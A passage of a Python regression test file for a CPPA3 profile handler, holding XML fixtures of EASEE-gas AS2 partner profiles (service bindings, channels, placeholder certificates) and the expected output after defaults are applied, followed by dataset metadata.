<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_13_40">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_14_42">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_14_44">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A06</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_15_46">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_15_48">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_16_50">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_16_52">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_17_54">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_17_56">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZSH"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_18_58">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_18_60">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A09</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_19_62">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A06</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_20_64">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_20_66">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_21_68">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_22_70">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="Meter Read"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_23_72">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="Mark Tr"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_24_74">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="FACILITY OPERATOR"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A10</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_25_76">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="StorageLNGOperator"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A09</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_26_78">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTY"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A08</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_27_80">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_27_82">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTZ"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A08</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_28_84">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_28_86">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTU"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_29_88">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_29_90">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_30_92">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_30_94">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTT"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_31_96">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_31_98">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_32_100">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_32_102">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTV"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A05</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_33_104">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="Consumer"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_34_106">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="SU"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_35_108">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZAA"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_36_110">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/initiator"/>
<cppa:CounterPartyRole name="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/responder"/>
<cppa:ServiceBinding>
<cppa:Service>http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/service</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/test" id="ab_37_112">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/responder"/>
<cppa:CounterPartyRole name="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/initiator"/>
<cppa:ServiceBinding>
<cppa:Service>http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/service</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/test" id="ab_38_114">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:AS2Channel id="easeegas_as2_signal" asResponse="true">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile/MDN</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2000/09/xmldsig#rsa-sha1</cppa:SignatureAlgorithm>
</cppa:Signature>
</cppa:AS2Channel>
<cppa:AS2Channel id="b_ch_send" transport="tr_send">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2000/09/xmldsig#rsa-sha1</cppa:SignatureAlgorithm>
<cppa:SigningCertificateRef certId="_SCNXER"/>
</cppa:Signature>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2001/04/xmlenc#tripledes-cbc</cppa:EncryptionAlgorithm>
</cppa:Encryption>
<cppa:ErrorHandling>
<cppa:ReceiverErrorsReportChannelId>b_ch_send_signals</cppa:ReceiverErrorsReportChannelId>
</cppa:ErrorHandling>
<cppa:ReceiptHandling>
<cppa:ReceiptChannelId>b_ch_send_signals</cppa:ReceiptChannelId>
</cppa:ReceiptHandling>
<cppa:Compression>
<cppa:CompressionAlgorithm>application/pkcs7-mime</cppa:CompressionAlgorithm>
</cppa:Compression>
</cppa:AS2Channel>
<cppa:AS2Channel id="b_ch_send_signals" asResponse="true">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile/MDN</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2000/09/xmldsig#rsa-sha1</cppa:SignatureAlgorithm>
</cppa:Signature>
</cppa:AS2Channel>
<cppa:AS2Channel id="b_ch_receive" transport="tr_receive">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2000/09/xmldsig#rsa-sha1</cppa:SignatureAlgorithm>
</cppa:Signature>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2001/04/xmlenc#tripledes-cbc</cppa:EncryptionAlgorithm>
<cppa:EncryptionCertificateRef certId="_4UP74O"/>
</cppa:Encryption>
<cppa:ErrorHandling>
<cppa:ReceiverErrorsReportChannelId>easeegas_as2_signal</cppa:ReceiverErrorsReportChannelId>
</cppa:ErrorHandling>
<cppa:ReceiptHandling>
<cppa:ReceiptChannelId>easeegas_as2_signal</cppa:ReceiptChannelId>
</cppa:ReceiptHandling>
<cppa:Compression>
<cppa:CompressionAlgorithm>application/pkcs7-mime</cppa:CompressionAlgorithm>
</cppa:Compression>
</cppa:AS2Channel>
<cppa:HTTPTransport id="tr_send">
<cppa:ClientIPv4>1.2.3.4</cppa:ClientIPv4>
<cppa:TransportLayerSecurity>
<cppa:TLSProtocol version="1.2">TLS</cppa:TLSProtocol>
</cppa:TransportLayerSecurity>
</cppa:HTTPTransport>
<cppa:HTTPTransport id="tr_receive">
<cppa:Endpoint>https://tso1.eu/as2</cppa:Endpoint>
<cppa:TransportLayerSecurity>
<cppa:TLSProtocol version="1.2">TLS</cppa:TLSProtocol>
</cppa:TransportLayerSecurity>
</cppa:HTTPTransport>
<cppa:PayloadProfile id="edigas">
<cppa:PayloadPart maxOccurs="1" minOccurs="1">
<cppa:PartName>businessdocument</cppa:PartName>
<cppa:MIMEContentType>application/xml</cppa:MIMEContentType>
<cppa:Property maxOccurs="1" minOccurs="1" name="EDIGASDocumentType"/>
</cppa:PayloadPart>
</cppa:PayloadProfile>
<cppa:SOAPWithAttachmentsEnvelope id="entsog_package">
<cppa:SimpleMIMEPart PartName="businessdocument"/>
</cppa:SOAPWithAttachmentsEnvelope>
</cppa:CPP>
""", self.parser)
self._test_regression('0008', result, expected)
def test_0008(self):
logging.info('Test 0008')
data = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://docs.oasis-open.org/ebxmlcppa/cppa-3.0 file:../../../cppa3-xsd/cppa3.xsd">
<cppa:ProfileInfo>
<cppa:ProfileIdentifier>EASEE-gas AS2 Profile for TSO 1</cppa:ProfileIdentifier>
</cppa:ProfileInfo>
<cppa:PartyInfo>
<cppa:PartyName xml:lang="en">TSO 1</cppa:PartyName>
<cppa:PartyId type="http://www.entsoe.eu/eic-codes/eic-party-codes-x">21X-EU-A-A0A0A-A</cppa:PartyId>
<cppa:PartyContact>
<cppa:ContactType>Technical Contact</cppa:ContactType>
<cppa:DirectTelephone>+3791234560</cppa:DirectTelephone>
<cppa:Email>edi@tso1.eu</cppa:Email>
</cppa:PartyContact>
<cppa:PartyContact></cppa:PartyContact>
<cppa:Certificate id="_OYHRBO">
<ds:KeyInfo>
<ds:KeyName>Signing certificate for TSO 1</ds:KeyName>
<ds:X509Data>
<ds:X509Certificate>RGl0IGlzIGVlbiBjZXJ0aWZpY2FhdCBpbiBiYXNlIDY0IGNvZGVyaW5n</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</cppa:Certificate>
<cppa:Certificate id="_YE5XZF">
<ds:KeyInfo>
<ds:KeyName>Encryption certificate for TSO 1</ds:KeyName>
<ds:X509Data>
<ds:X509Certificate>RGl0IGlzIGVlbiBhbmRlciBjZXJ0aWZpY2FhdCBpbiBiYXNlIDY0IGNvZGVyaW5n</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</cppa:Certificate>
<cppa:CertificateDefaults>
<cppa:SigningCertificateRef certId="_YE5XZF"/>
<cppa:EncryptionCertificateRef certId="_OYHRBO"/>
</cppa:CertificateDefaults>
</cppa:PartyInfo>
<cppa:ServiceSpecification>
<cppa:PartyRole name="*"/>
<cppa:CounterPartyRole name="*"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">*</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="*" id="ab_1_2">
<cppa:ChannelId>ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="*" id="ab_1_4">
<cppa:ChannelId>ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:AS2Channel id="ch_send" transport="tr_send" package="easee-gas_package">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SigningCertificateRef certId="_OYHRBO"/>
</cppa:Signature>
<cppa:Encryption/>
</cppa:AS2Channel>
<cppa:AS2Channel id="ch_receive" transport="tr_receive" package="easee-gas_package" >
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature/>
<cppa:Encryption>
<cppa:EncryptionCertificateRef certId="_YE5XZF"/>
</cppa:Encryption>
</cppa:AS2Channel>
<cppa:HTTPTransport id="tr_send">
<cppa:ClientIPv4>1.2.3.4</cppa:ClientIPv4>
</cppa:HTTPTransport>
<cppa:HTTPTransport id="tr_receive">
<cppa:Endpoint>https://tso1.eu/as2</cppa:Endpoint>
</cppa:HTTPTransport>
<cppa:PayloadProfile id="edigas">
<cppa:PayloadPart maxOccurs="1" minOccurs="1">
<cppa:PartName>businessdocument</cppa:PartName>
<cppa:MIMEContentType>application/xml</cppa:MIMEContentType>
</cppa:PayloadPart>
</cppa:PayloadProfile>
<cppa:MIMEEnvelope id="easee-gas_package">
<cppa:SimpleMIMEPart PartName="businessdocument"/>
</cppa:MIMEEnvelope>
</cppa:CPP>
""", self.parser)
result = self.handler.apply_profile_configs(data)
logging.info('Result: {}'.format(lxml.etree.tostring(result,
pretty_print=True)))
expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ProfileInfo>
<cppa:ProfileIdentifier>EASEE-gas AS2 Profile for TSO 1</cppa:ProfileIdentifier>
</cppa:ProfileInfo>
<cppa:PartyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<cppa:PartyName xml:lang="en">TSO 1</cppa:PartyName>
<cppa:PartyId type="http://www.entsoe.eu/eic-codes/eic-party-codes-x">21X-EU-A-A0A0A-A</cppa:PartyId>
<cppa:PartyContact>
<cppa:ContactType>Technical Contact</cppa:ContactType>
<cppa:DirectTelephone>+3791234560</cppa:DirectTelephone>
<cppa:Email>edi@tso1.eu</cppa:Email>
</cppa:PartyContact>
<cppa:PartyContact/>
<cppa:Certificate id="_OYHRBO">
<ds:KeyInfo>
<ds:KeyName>Signing certificate for TSO 1</ds:KeyName>
<ds:X509Data>
<ds:X509Certificate>RGl0IGlzIGVlbiBjZXJ0aWZpY2FhdCBpbiBiYXNlIDY0IGNvZGVyaW5n</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</cppa:Certificate>
<cppa:Certificate id="_YE5XZF">
<ds:KeyInfo>
<ds:KeyName>Encryption certificate for TSO 1</ds:KeyName>
<ds:X509Data>
<ds:X509Certificate>RGl0IGlzIGVlbiBhbmRlciBjZXJ0aWZpY2FhdCBpbiBiYXNlIDY0IGNvZGVyaW5n</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</cppa:Certificate>
<cppa:CertificateDefaults>
<cppa:SigningCertificateRef certId="_YE5XZF"/>
<cppa:EncryptionCertificateRef certId="_OYHRBO"/>
</cppa:CertificateDefaults>
</cppa:PartyInfo>
<cppa:ServiceSpecification>
<cppa:PartyRole name="*"/>
<cppa:CounterPartyRole name="*"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">*</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="*" id="ab_1_2">
<cppa:ChannelId>ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="*" id="ab_1_4">
<cppa:ChannelId>ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:AS2Channel id="easeegas_as2_signal_inbound" asResponse="true">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2000/09/xmldsig#rsa-sha1</cppa:SignatureAlgorithm>
</cppa:Signature>
</cppa:AS2Channel>
<cppa:AS2Channel id="ch_send" transport="tr_send" package="easee-gas_package">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2000/09/xmldsig#rsa-sha1</cppa:SignatureAlgorithm>
<cppa:SigningCertificateRef certId="_OYHRBO"/>
</cppa:Signature>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2001/04/xmlenc#tripledes-cbc</cppa:EncryptionAlgorithm>
</cppa:Encryption>
<cppa:ErrorHandling>
<cppa:ReceiverErrorsReportChannelId>easeegas_as2_signal_inbound</cppa:ReceiverErrorsReportChannelId>
</cppa:ErrorHandling>
<cppa:ReceiptHandling>
<cppa:ReceiptChannelId>easeegas_as2_signal_inbound</cppa:ReceiptChannelId>
</cppa:ReceiptHandling>
<cppa:Compression>
<cppa:CompressionAlgorithm>application/pkcs7-mime</cppa:CompressionAlgorithm>
</cppa:Compression>
</cppa:AS2Channel>
<cppa:AS2Channel id="easeegas_as2_signal_outbound" asResponse="true">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2000/09/xmldsig#rsa-sha1</cppa:SignatureAlgorithm>
</cppa:Signature>
</cppa:AS2Channel>
<cppa:AS2Channel id="ch_receive" transport="tr_receive" package="easee-gas_package">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2000/09/xmldsig#rsa-sha1</cppa:SignatureAlgorithm>
</cppa:Signature>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2001/04/xmlenc#tripledes-cbc</cppa:EncryptionAlgorithm>
<cppa:EncryptionCertificateRef certId="_YE5XZF"/>
</cppa:Encryption>
<cppa:ErrorHandling>
<cppa:ReceiverErrorsReportChannelId>easeegas_as2_signal_outbound</cppa:ReceiverErrorsReportChannelId>
</cppa:ErrorHandling>
<cppa:ReceiptHandling>
<cppa:ReceiptChannelId>easeegas_as2_signal_outbound</cppa:ReceiptChannelId>
</cppa:ReceiptHandling>
<cppa:Compression>
<cppa:CompressionAlgorithm>application/pkcs7-mime</cppa:CompressionAlgorithm>
</cppa:Compression>
</cppa:AS2Channel>
<cppa:HTTPTransport id="tr_send">
<cppa:ClientIPv4>1.2.3.4</cppa:ClientIPv4>
<cppa:TransportLayerSecurity>
<cppa:TLSProtocol version="1.2">TLS</cppa:TLSProtocol>
</cppa:TransportLayerSecurity>
</cppa:HTTPTransport>
<cppa:HTTPTransport id="tr_receive">
<cppa:Endpoint>https://tso1.eu/as2</cppa:Endpoint>
<cppa:TransportLayerSecurity>
<cppa:TLSProtocol version="1.2">TLS</cppa:TLSProtocol>
</cppa:TransportLayerSecurity>
</cppa:HTTPTransport>
<cppa:PayloadProfile id="edigas">
<cppa:PayloadPart maxOccurs="1" minOccurs="1">
<cppa:PartName>businessdocument</cppa:PartName>
<cppa:MIMEContentType>application/xml</cppa:MIMEContentType>
</cppa:PayloadPart>
</cppa:PayloadProfile>
<cppa:MIMEEnvelope id="easee-gas_package">
<cppa:SimpleMIMEPart PartName="businessdocument"/>
</cppa:MIMEEnvelope>
</cppa:CPP>
""", self.parser)
self._test_regression('0008', result, expected)
| 51.518397
| 167
| 0.69906
| 8,935
| 78,411
| 6.058534
| 0.043872
| 0.074114
| 0.063399
| 0.04585
| 0.978941
| 0.976835
| 0.976022
| 0.975486
| 0.974692
| 0.970092
| 0
| 0.037322
| 0.145043
| 78,411
| 1,521
| 168
| 51.552268
| 0.770175
| 0.000344
| 0
| 0.956728
| 0
| 0.144016
| 0.931717
| 0.373335
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007437
| false
| 0.000676
| 0.003381
| 0
| 0.011494
| 0.007437
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c3f79012b5a1ab62844408dbc08ab7a6343af85a
| 2,726
|
py
|
Python
|
pcat2py/class/21064964-5cc5-11e4-af55-00155d01fe08.py
|
phnomcobra/PCAT2PY
|
937c3b365cdc5ac69b78f59070be0a21bdb53db0
|
[
"MIT"
] | null | null | null |
pcat2py/class/21064964-5cc5-11e4-af55-00155d01fe08.py
|
phnomcobra/PCAT2PY
|
937c3b365cdc5ac69b78f59070be0a21bdb53db0
|
[
"MIT"
] | null | null | null |
